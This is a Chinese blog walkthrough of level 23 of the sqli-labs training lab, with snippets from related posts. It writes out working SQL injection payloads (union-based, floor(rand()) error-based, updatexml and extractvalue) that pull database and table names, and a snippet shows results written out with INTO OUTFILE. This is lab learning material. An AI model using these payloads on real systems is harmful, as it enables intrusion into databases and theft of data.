sqlilabs less-23

最新推荐文章于 2024-05-30 14:52:09 发布
最新推荐文章于 2024-05-30 14:52:09 发布
阅读量205 收藏
点赞数
分类专栏: sqli-labs 文章标签: sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37370714/article/details/125744420
版权

sqlilabs less-23

前期判断

先来判断注入类型
在这里插入图片描述
在这里插入图片描述
测试1‘#以及1’–+发现依旧报错,可能注释符号被过滤了。

闭合单引号注入

既然它的sql语句是这样

select …… from table where id = ''
为什么不能让它这样
select …… from table where id = '1' union select null,null,null '1'

在这里插入图片描述
在这里插入图片描述

然后找显示的行
在这里插入图片描述

在这里插入图片描述
直接注入不进去,换报错注入吧

-1' union select 1,count(*),concat((select group_concat(table_name) from information_schema.tables where table_schema=database()),floor(rand()*2))'1

在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
很好奇如果我用extractvalue或updatexml是不是也行呢
试验一下

' and updatexml(1,concat(0x7c,(select database())),1)'1
' and extractvalue(1,concat(0x7c,(select database())))'1

在这里插入图片描述
为什么不行?突然发现

select …… from table where id = '1' and updatexml(1,concat(0x7c,(select database())),1) '1'

因为没有and 所以sql不知道这“updatexml(1,concat(0x7c,(select database())),1)‘1’”是什么东西,所以要加and,突然想到前面直接注入失败也是因为没注意这个问题而导致的。
在这里插入图片描述
加了and以后的普通注入
在这里插入图片描述

源码分析

来看看源码
在这里插入图片描述
把#和–替换成了空,所以导致注释符失效。

永远是深夜有多好。
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Sqli-labs之Less-23
→_→
04-18 662
Less-23 基于错误的,过滤注释的GET型 判断注入类型: ?id=1 ?id=1' ?id=1" 发现第二条语句报错: 翻译: 警告:mysql_fetch_array()期望参数1为资源,布尔值在第38行的C:\ phpStudy \ WWW \ sqli ...
SQLi-LABS Less-23
m0_64898960的博客
04-25 1892
Less-23题目 回到GET注入了,乍一看还以为回到了梦开始的地方…(估计在这里开始学绕过啥的) 尝试==?id=1’== ,结果报错 由报错可知这里存在过滤,手游我们就需要慢慢进行测试看看它过滤了什么 这里#被过滤了,–+也被过滤了,尝试%23 用or ‘1’='1进行闭合,成功回显… 接下来继续进行注入,由于我们使用了or ‘1’='1来结尾,所以这里不能使用order by来查询字段。 如果不能用order by来查询字段,还可以用union来查询。 得到字段数继续进行注入… 得到数据库后
sqli-labs/Less-23
m0_71299382的博客
11-19 144
sqli-labs第二十三关
sqli-labs————less 23(高级注入篇)
Fly_鹏程万里
05-12 2007
前言从这一关开始,我们进进入了短暂的高级注入部分,这一部分中将会陆续介绍一些更为巧妙的注入技巧。Less -23查看一下源代码:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html...
Sqli-labs Less23 错误型联合查询 - GET
kevinhanser
08-10 532
本文记录 SQL 注入的学习过程,资料为 SQLi SQLi 博客目录 Less - 23: GET - Error based - stip comments 测试漏洞 使用测试语句 ?id=1’ http://10.10.10.137/sqli-labs/Less-23/?id=1%27 显示错误信息 You have an error in your SQL ...
sqli-labs less1.txt
11-26
sqli-labs less1 sql注入第一题,单引号闭合,详细全程,web注入实验,学习sql注入
sqli-labs lesson8 python 脚本源代码(修复小bug后的版本)
04-29
该源代码是sqli-labs/Less-8所使用到的脚本源代码,运行环境是python3.资源分最低只能选2,我也没办法,或者给我留言也行,本人也是菜鸟一个,无意通过这个收取资源分,哈哈
less-plugin-autoprefix:添加了由 autoprefixer 对 less 进行后处理的能力
05-29
npm install -g less-plugin-autoprefix 然后在命令行上, lessc file.less --autoprefix="browsers" 浏览器是由逗号分隔的列表。 程序化用法 var LessPluginAutoPrefix = require ( 'less-plugin-autoprefix' )...
less-plugin-clean-css:使用clean-css对CSS进行后期处理和压缩
02-23
npm install -g less-plugin-clean-css 然后在命令行上 lessc file.less --clean-css="--s1 --advanced --compatibility=ie8" 见的可用命令选项-唯一的区别是advanced和rebase ,我们默认为false,因为它并不总是...
Sqli-labs less 23
weixin_34284188的博客
08-11 87
第二部分/page-2 Advanced injection Less-23 Sql语句为$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";此处主要是在获取id参数时进行了#,--注释符号的过滤。 Solution: http://127.0.0.1/sqllib/Less-23/index.php?id=-1%27union%20s...
sqli-labs less23
qq_45106794的博客
10-26 222
#sqli-labs less 23 这一关的与第一关的区别有两个,一个是注释符# --+被过滤了 所以我们得闭合第二个单引号 另一个区别是不能用order by 来判断字段数了 具体原因请参照 https://www.jianshu.com/p/2602430f8ee4 ’ union select 1,2,3,4 or ‘1’='1 ’ union select 1,version(),3 o...
SQLi LABS Less 23 联合注入+报错注入+布尔盲注
wangyuxiang946的博客
08-15 1万+
SQLi 第二十三关,SQLi-LABS Less-23SQLi-LABS Less 23SQLiLABS Less23SQLi Less 23
sqli-labs Less-23sqli-labs闯关指南 23)—Advanced injection
m0_54899775的博客
12-23 1187
sqli-labs Less-23sqli-labs闯关指南 23
sqli-labs (less23-less24)
Xi4or0uji
08-04 650
less 23 报错注入&过滤注释符 这关后台查询语句是select xxx form xxx where id='$_GET['id']' limit 0,1 讲道理其实跟之前的差不多的,只是对--,#这些注释的符号进行了过滤 所以最后的payload就是 ?id=-1' or extractvalue(1,concat('~',(select schema_name from...
通过sqli-labs学习sql注入——进阶挑战之less23-28a
热门推荐
giantbranch的专栏
06-10 1万+
本文链接:http://blog.csdn.net/u012763794/article/details/51457142   这次我又来了,Advanced Injections(进阶挑战),就是一些过滤绕过的东西了,基础挑战看这个两篇 最近搞逆向破解去了,http://www.giantbranch.cn/myblog/?p=27,所以这个拖得太久了,今天完工   通过sqli-la...
基于Sqli-Labs靶场的SQL注入-23~24关
Joker
01-04 1225
重点讲二次注入
基础—SQL—DQL(数据查询语言)聚合函数
最新发布
m0_74363339的博客
05-30 375
这篇博客主要讲到了SQL分类中的DQL(数据查询语言)—聚合函数的讲解,聚合函数比较简单,但它主要配合着分组查询进行数据查询的操作,注意NULL的字段值不参与聚合函数的运算......
sqli-labs-less-7
09-26
sqli-labs less-7是一个web注入实验,它是用来学习SQL注入的。在这个实验中,我们需要使用不同的注入技术来绕过应用程序的安全措施,并从数据库中获取敏感信息。在这个具体的题目中,我们需要使用UNION SELECT语句来实现注入。 根据引用和引用提供的信息,我们可以得出以下步骤: 1. 构造注入语句:在URL参数中使用单引号来闭合原始查询,然后使用UNION SELECT语句来执行额外的SQL查询。在这个例子中,注入语句是?id=-1')) union select 1,user(),database()。 2. 将查询结果导出到文件中:使用INTO OUTFILE语句将注入的查询结果导出到指定的文件路径。在这个例子中,查询的结果将被导出到文件"E:\\phpStudy_64\\phpstudy_pro\\WWW\\sqlilabs\\Less-7\\1.txt"中。 通过这些步骤,我们可以成功执行SQL注入攻击,并将查询结果保存到指定的文件中。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值